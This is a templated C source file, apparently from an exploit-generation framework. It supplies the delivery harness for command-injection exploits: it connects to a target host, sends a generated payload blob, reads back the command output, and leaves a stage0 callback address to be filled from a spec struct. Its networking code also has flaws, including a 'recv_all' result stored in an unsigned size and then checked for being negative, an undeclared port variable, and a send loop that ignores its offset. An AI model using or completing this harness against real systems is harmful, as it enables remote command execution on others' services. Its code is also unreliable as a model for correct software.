#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#include "exploit_spec.h"

#define RETURN(X) ({return X;})

{% set newline = joiner('\n') -%}
{% for name, value in constants.items() %}
{%- set value = value.value -%}
{%- if value is not none -%}
{{- newline() -}}
#define {{ name }} {{ value | cstring if value.__class__.__name__ == 'bytes' else value }}
{% endif -%}
{% endfor %}

static CommandInjectionV1* g_exp = NULL;
#define IP g_exp->stage0_ip
#define PORT g_exp->stage0_port

char *blob = NULL;
size_t blob_size = 0;
size_t blob_cap = 0;

void blob_reset()
{
   //reset blob global for next round of connections
   if (blob != NULL)
   {
	  free(blob);
   }
   blob = NULL;
   blob_size = 0;
   blob_cap = 0;
}

void blob_append(const char *data, size_t size)
{
    blob_size += size;
    if (blob_size > blob_cap) {
        if (blob_cap == 0) {
            blob_cap = 1024;
        }
        while (blob_size > blob_cap) {
            blob_cap *= 2;
        }
        blob = realloc(blob, blob_cap);
    }
    memcpy(&blob[blob_size - size], data, size);
}

void blob_append_fmt(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    size_t trysize = strlen(fmt)*2;
    char *trythis = malloc(trysize);

    while (1) {
        va_list aq;
        va_copy(aq, ap);
        size_t psize = vsnprintf(trythis, trysize, fmt, aq);
        if (psize < trysize) {
            blob_append(trythis, psize);
            break;
        } else {
            trysize *= 2;
            free(trythis);
            trythis = malloc(trysize);
        }
    }

    free(trythis);
}

#define BLOB_APPEND_CONST(data) blob_append(data, sizeof(data)-1)

static int connect_target(void)
{
    int sock;
    if (g_exp->ip_type == IPv4)
    {
        struct sockaddr_in target_addr;
        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            return -ERROR_LOCAL_RESOURCES_NOT_AVAILABLE;
        }
        target_addr.sin_family = AF_INET;
        target_addr.sin_port = htons(g_exp->override_target_port);
        if (inet_pton(AF_INET, g_exp->target_ip, &target_addr.sin_addr) <= 0) {
            return -ERROR_INVALID_TARGET_IP;
        }

        if (connect(sock, (struct sockaddr *)&target_addr, sizeof(target_addr)) < 0) {
            return -ERROR_VULNERABLE_SERVICE_NOT_FOUND;
        }
    }
    else
    {
        struct sockaddr_in6 target_addr;
        if ((sock = socket(AF_INET6, SOCK_STREAM, 0)) < 0) {
            return -ERROR_LOCAL_RESOURCES_NOT_AVAILABLE;
        }
        target_addr.sin6_family = AF_INET6;
        target_addr.sin6_port = htons(g_exp->override_target_port);
        target_addr.sin6_scope_id = g_exp->ipv6_scope_id;
        if (inet_pton(AF_INET6, g_exp->target_ip, &target_addr.sin6_addr) <= 0) {
            return -ERROR_INVALID_TARGET_IP;
        }
        if (connect(sock, (struct sockaddr *)&target_addr, sizeof(target_addr)) < 0) {
            return -ERROR_VULNERABLE_SERVICE_NOT_FOUND;
        }
    }
    return sock;
}

ssize_t send_all(int sock, const char *data, size_t size) {
    size_t sent = 0;
    while (sent < size) {
        int one_sent = send(sock, data, size-sent, 0);
        if (one_sent < 0) {
            return one_sent;
        }
        sent += one_sent;
    }
    return sent;
}

ssize_t recv_all(int sock, char **data) {
    char *result = NULL;
    size_t result_size = 0;
    char buf[4096];

    while (1) {
        int one_size = recv(sock, buf, sizeof(buf), 0);
        if (one_size < 0) {
            free(result);
            *data = NULL;
            return one_size;
        }
        if (one_size == 0) {
            *data = result;
            return result_size;
        }

        result_size += one_size;
        result = realloc(result, result_size);
        memcpy(&result[result_size - one_size], buf, one_size);
    }
}

ExploitResult finish(int sock) {
    shutdown(sock, SHUT_WR);

    char *result;
    size_t result_size;
    result_size = recv_all(sock, &result);
    close(sock);

    if (result_size < 0) {
        PERROR("recv");
        return ERROR_UNKNOWN_NO_ADDITIONAL_INFO;
    }

    WRITE_STDOUT(result);
    return NO_ERROR_DETECTED;
}

ExploitResult exploit_entry(uint32_t exploit_spec_version, const void* exploit_struct)
{
    if (exploit_spec_version != 1)
    {
        return ERROR_UNSUPPORTED_EXPLOIT_SPEC_VERSION;
    }

    // Assume we were passed `struct CommandInjectionV1` in exploit_struct (protocol lacks
    // way to assert this case)
    g_exp = (struct CommandInjectionV1 *)exploit_struct;
    if (g_exp->override_target_port != NO_TARGET_PORT_SPECIFIED) {
        g_target_port = g_exp->override_target_port;
    }

{% set newline = joiner('\n') -%}
{% for action in actions %}
{{- newline() -}}
{{ '    ' }}
{%- if action.function_result.name -%}
    {%- set type = action.function_result.type_ -%}
    {{ type if type is string else type.__name__ }}
    {{- ' ' -}}
    {{ action.function_result.name }} ={{ ' ' }}
{%- endif -%}
    {{ action.function }}(
{%- set separator = joiner(', ') -%}
{%- for arg in action.args -%}
    {{- separator() -}}
    {{ arg | cstring if arg.__class__.__name__ == 'bytes' else arg }}
{%- endfor -%}
    );
{% endfor -%}
}
